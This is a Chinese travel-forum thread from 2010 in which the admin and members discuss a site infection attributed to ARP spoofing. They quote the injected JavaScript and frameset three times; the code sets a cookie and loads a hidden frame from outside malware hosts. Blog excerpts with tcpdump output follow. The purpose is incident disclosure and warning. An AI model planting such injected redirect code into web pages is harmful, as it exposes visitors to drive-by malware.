APP 手机版 繁體
返回列表 发新帖

建议各位同学安装好防毒软件

[复制链接]

帅哥勋章 热心会员勋章 摄影师勋章 实名认证勋章

598

主题

17万

积分

1万

好友

乘务长 鲜花(372)

admin

Ta的旅行分答: 扫一扫,即可提问
大飞 发表于 2010-5-19 10:51:23  | 显示全部楼层 | 阅读模式
各位同学,
     在昨天和今天上午, 网站受到挂马攻击。
     在网页中被加入了以下代码, 具体表现为会不能登录, 页面出现XML 错误, 弹出错误窗口。
<script>
function showme()
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://meme.bszgwl.com/xs/dk.html";}
}
</script>
     已经进行过清理。
     建议各位同学安装好防毒软件,

乘务长 鲜花(372)

admin

大飞 发表于 2010-5-19 10:58:35  | 显示全部楼层
一些有同样问题的贴子。
http://www.discuz.net/viewthread.php?tid=1581159


这个挂马仅存在于 cache数据中, 其它文件并没有被修改, 关闭网站, 重开会把所有cache清空。 问题可以得到暂时解决。

乘务长 鲜花(85)

flyworld 发表于 2010-5-19 11:37:11  | 显示全部楼层
本帖最后由 flyworlddream 于 2010-5-19 11:39 编辑

可能是这个, 转载  http://www.huangshifu.net/2010/03

今天碰上了arp欺骗,服务器出来所有页面被篡改成一段代码,或者说是被挂马了:

<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf(”CK”);
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie=”CK=test;expires=”+EP.toGMTString();
self.hi.location=”http://sdnvjwf1.info/g.htm”;}
}
</script>
<frameset rows=”100%,*” onLoad=”showme()”>
<frame name=”hello” src=”/index.jsp?UpdatedPage=aGlqYWNr”>
<frame name=”hi” src=””>
</frameset>
</html>

这原理好像跟伟大防火墙类似,就是在你接收或发送的数据中搞点手脚,不同的是,arp欺骗是偷偷的,伟大防火墙是明着来。

这事还得用firefox浏览器才能发现,ff打开这种框架页面,浏览器下方会出现一条黑线,而且标题栏是空的,看起来很诡异。

找机房,机房客服的响应很快:这里一切正常,你还是查查自己服务器吧,要么给你重装服务器?

这种服务。。。我还要介绍其他朋友把服务器摆进去么?

早上一直扯皮到下午,谢总来了,带了些羊蹄,强叔也来了,带了一瓶红酒,于是聊天吃喝。

到了晚上,机器突然死了,机房说他们在处理什么,再起来的时候,页面代码恢复正常了。

我说,你们现在相信我了吧。

客服说,不是的,arp我们也查不到,是电信那边其他公司发过来的,他们的交换机我们没有权限。

看来一家公司的服务器中招,还牵扯到另外一家公司的服务器。

广东电信今年收费高了一倍,安全性却比以前差了,或者说,跟以前一样差
喜欢新的飞客茶馆app

乘务长 鲜花(85)

flyworld 发表于 2010-5-19 11:50:39  | 显示全部楼层
看来是机房的问题


http://www.php-oa.com/2010/05/05/updatedpage-aglqywnr-showme.html

从前天晚上开始,我的服务器一直不正常,显示不正常,打开后台也不正常,认真看看了很久,才发现在页面上发现了恶意代码,一直以为是服务器被黑客攻陷了,想想我做了不少的防护,能入侵这台的也不是简单的人啊。。。难道 wordpress 本身有问题。
问题现象如下
<script type="text/javascript">
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf(“CK”);
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie=”CK=test;expires=”+EP.toGMTString();
self.hi.location=”http://fgvp360.3322.org:97/xs/dk.html″;}
}
</script>




因为没有时间,工作事情实在太多,真到昨天晚上才开始看认真排查了所有可能,并未发现服务器异常的东西;后来使用 tcpdump 抓一下,看看是不是 arp 挂马 。证实是 arp 挂马。不是我的服务器有问题,同网段内有二台机器的 MAC 地址都不正常了。和网关的地址一样。内容如下
[root@localhost ~]# tcpdump -qne arp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
01:12:28.874824 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.26 tell 221.9.252.1
01:12:28.894981 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.59 tell 221.9.252.33
01:12:28.905141 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.56 tell 221.9.252.33
01:12:28.915787 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.30 tell 221.9.252.1
01:12:28.925851 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.54 tell 221.9.252.33
01:12:28.941453 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.16 tell 221.9.252.1
01:12:28.941458 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.25 tell 221.9.252.1
01:12:28.947469 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.34 tell 221.9.252.33
01:12:28.948341 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.51 tell 221.9.252.33
01:12:37.607996 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.206 tell 221.9.251.193
01:12:40.580420 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.206 tell 221.9.251.193
01:12:40.755736 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.23 tell 221.9.252.1
01:12:45.907790 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.57 tell 221.9.252.33
01:13:02.874002 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.47 tell 221.9.252.33
01:13:04.055118 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.47 tell 221.9.252.33
01:13:04.589391 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.252.59 tell 221.9.252.33
01:13:08.155945 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.204 tell 221.9.251.193
01:13:08.166247 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.205 tell 221.9.251.193
01:13:08.166252 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.201 tell 221.9.251.193
01:13:08.166925 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.197 tell 221.9.251.193
01:13:08.166929 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.200 tell 221.9.251.193
01:13:08.166932 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.203 tell 221.9.251.193
01:13:08.176642 00:0f:e2:6b:02:d4 > Broadcast, ARP, length 60: arp who-has 221.9.251.202 tell 221.9.251.193




可以从上面的 tcpdump 看到三台 mac 地址一样.
221.9.251.193
221.9.252.1
221.9.252.33
因为 arp 伪装装成网关,所以给通过网关的数据修改了。所以网页内容异常。所以其中一定有二台机器有问题。这个也没有什么好的解决方法,只能让机房处理一下那二台机器,要不在网关上绑定你的 MAC 的 ip 也行。
我没法子,只能修改另一个网段的 ip ,先这样用着。
喜欢新的飞客茶馆app

蓝钻会员 鲜花(0)

kimi9999 发表于 2010-5-19 12:16:53  | 显示全部楼层
经鉴定,楼上的都是人才。。。

大家千万注意,别裸奔呀~~~

钻石会员 鲜花(0)

眯眯猪 发表于 2010-5-19 12:20:04  | 显示全部楼层
昨晚上飞客点某个链接时,被卡巴提醒有木马,后来发现坛里的图片都看不见了,上别的论坛没事。那我的机器算中毒了吗?既然有提醒,应该没问题吧。

禁止访问 鲜花(5)

20080802 发表于 2010-5-19 12:25:20  | 显示全部楼层
这么高深的东西,看不懂~~~MAC,不会中毒

钻石会员 鲜花(11)

shlonglong 发表于 2010-5-19 12:34:36  | 显示全部楼层
浣犲拫鍒╃敤婕忔礊鍛紝 @澶ч蹇潵绂佹璁块棶鍚э紒

钻石会员 鲜花(14)

kerrzhang 发表于 2010-5-19 13:24:08  | 显示全部楼层
今天早上我的防毒软件提示被挂马了

钻石会员 鲜花(0)

静默花开 发表于 2010-5-20 00:53:05  | 显示全部楼层
我最惨,自以为不会走病毒对面,所以都不装杀毒软件,下了个版里的东东然后开始乱跳网站,图片打不开,无奈重启,结果蓝屏了```好在有备份,不堪设想!
怕怕..PA.PA..
面朝大海 春暖花开

钻石会员 鲜花(2)

macmini 发表于 2010-5-20 01:30:25  | 显示全部楼层
这么高深的东西,看不懂~~~MAC,不会中毒
20080802 发表于 2010-5-19 12:25


其实也会中,只是如果中了,一般就死的比较难看了,应该是有人存心收拾你了

禁止访问 鲜花(5)

20080802 发表于 2010-5-20 04:02:50  | 显示全部楼层
回复 11# macmini


    真的啊~~~反正至今没中过毒

乘务长 鲜花(85)

flyworld 发表于 2010-5-20 12:08:11  | 显示全部楼层
昨晚上飞客点某个链接时,被卡巴提醒有木马,后来发现坛里的图片都看不见了,上别的论坛没事。那我的机器算 ...
眯眯猪 发表于 2010-5-19 12:20


没问题的!

蓝钻会员 鲜花(1)

wuhaolou 发表于 2010-5-20 18:41:43  | 显示全部楼层
这事还得用firefox浏览器才能发现,ff打开这种框架页面,浏览器下方会出现一条黑线,而且标题栏是空的,看起来很诡异。

现在6:41  我用FF,又是这种情况...

钻石会员 鲜花(9)

随柳风 发表于 2010-5-20 18:57:33  | 显示全部楼层
XML解析错误:未组织好 位置:http://www.flyertea.com/pm.php?checknewpm=0.8077397199556234& inajax=1&ajaxtarget=myprompt_check 行:16,列:70:
我在加拿大用FF访问还是提示以上,用IE7不能显示头像。
淡泊淳真

钻石会员 鲜花(11)

shlonglong 发表于 2010-5-20 19:09:40  | 显示全部楼层
IE、OPERA都不能显示头像。
刚才有一阵子是拒绝访问,code=403

白金会员 鲜花(0)

xiaosuw 发表于 2010-5-22 23:18:56  | 显示全部楼层
好好又学习了一遍。5555。。。
天地有大美而不言

金卡会员 鲜花(1)

lj_cd 发表于 2010-6-7 23:05:02  | 显示全部楼层
我说一上这个网怎么杀毒软件就狂工作呢

发表回复

您需要登录后才可以回帖 登录 | 注册

本版积分规则

关于我们
关于飞客
发展成长
媒体报道
企业愿景
联系我们
商务合作
加盟飞客
投资人关系
帮助中心
服务协议
帮助中心
在线客服
投诉建议
关注我们
官方APP
官方微信
官方微博
快速回复 返回顶部 返回列表